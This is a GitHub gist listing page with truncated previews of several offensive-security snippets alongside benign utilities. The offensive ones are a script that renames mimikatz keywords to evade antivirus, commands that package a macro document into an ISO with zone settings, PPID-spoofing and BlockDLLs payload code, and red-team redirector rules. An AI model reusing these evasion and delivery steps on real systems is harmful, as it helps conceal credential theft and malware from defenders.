Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

View gabemarshall's full-sized avatar

Gabe Marshall gabemarshall

121 followers · 15 following
View GitHub Profile
@awakecoding
awakecoding / Get-RdpLogonEvent.ps1
Created September 7, 2022 01:20
function Get-RdpLogonEvent
{
[CmdletBinding()]
param(
[Int32] $Last = 10
)
$RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{
LogName='Security'
ProviderName='Microsoft-Windows-Security-Auditing'
@mgeeky
mgeeky / gist:82d6abe0508ae81f107689864fb5dfc0
Created September 6, 2022 12:09
office-to-iso-with-motw.txt
# Pack macro-enabled doc to ISO
py PackMyPayload.py Resume1337.xlsm test11.iso
# Apply MOTW on that ISO
Set-Content -Path test11.iso -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'
# Mount it
Mount-DiskImage -ImagePath test11.iso
@prologic
prologic / LearnGoIn5mins.md
Last active April 22, 2024 13:28
Learn Go in ~5mins
@rvrsh3ll
rvrsh3ll / blockdlls_gadget2jscript.cs
Last active January 24, 2022 14:45
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;
public class Payload
{
public Payload()
@TheWover
TheWover / Find-Assemblies.ps1
Last active June 6, 2022 17:53
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
Param([parameter(Mandatory=$true,
HelpMessage="Directory to search for .NET Assemblies in.")]
$Directory,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to search recursively.")]
[switch]$Recurse = $false,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to include DLLs in the search.")]
[switch]$DLLs = $false,
[parameter(Mandatory=$false,
@rasta-mouse
rasta-mouse / PPID Spoof & BlockDLLs
Last active February 29, 2024 04:21
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace BlockDllTest
{
class Program
{
static void Main(string[] args)
{
@curi0usJack
curi0usJack / .htaccess
Last active March 13, 2024 10:17
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@mashingan
mashingan / monitorfs.nim
Last active January 14, 2021 17:59
Monitor folder and files using in Windows
import winim
proc quit(value: DWORD) =
quit value.int
proc refreshDirectory(handle: var HANDLE) =
handle = FindFirstChangeNotification(".", false,
FILE_NOTIFY_CHANGE_FILE_NAME)
if handle == INVALID_HANDLE_VALUE:
quit GetLastError()
@lanmaster53
lanmaster53 / pyscripter-snippets.py
Last active August 6, 2021 15:36
Burp Python Scripter scripts
# Moved to https://github.com/lanmaster53/pyscripter-er/tree/master/snippets
@imaibou
imaibou / mimikatz_obfuscator.sh
Last active April 10, 2024 20:24
Mimikatz Obfuscator
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'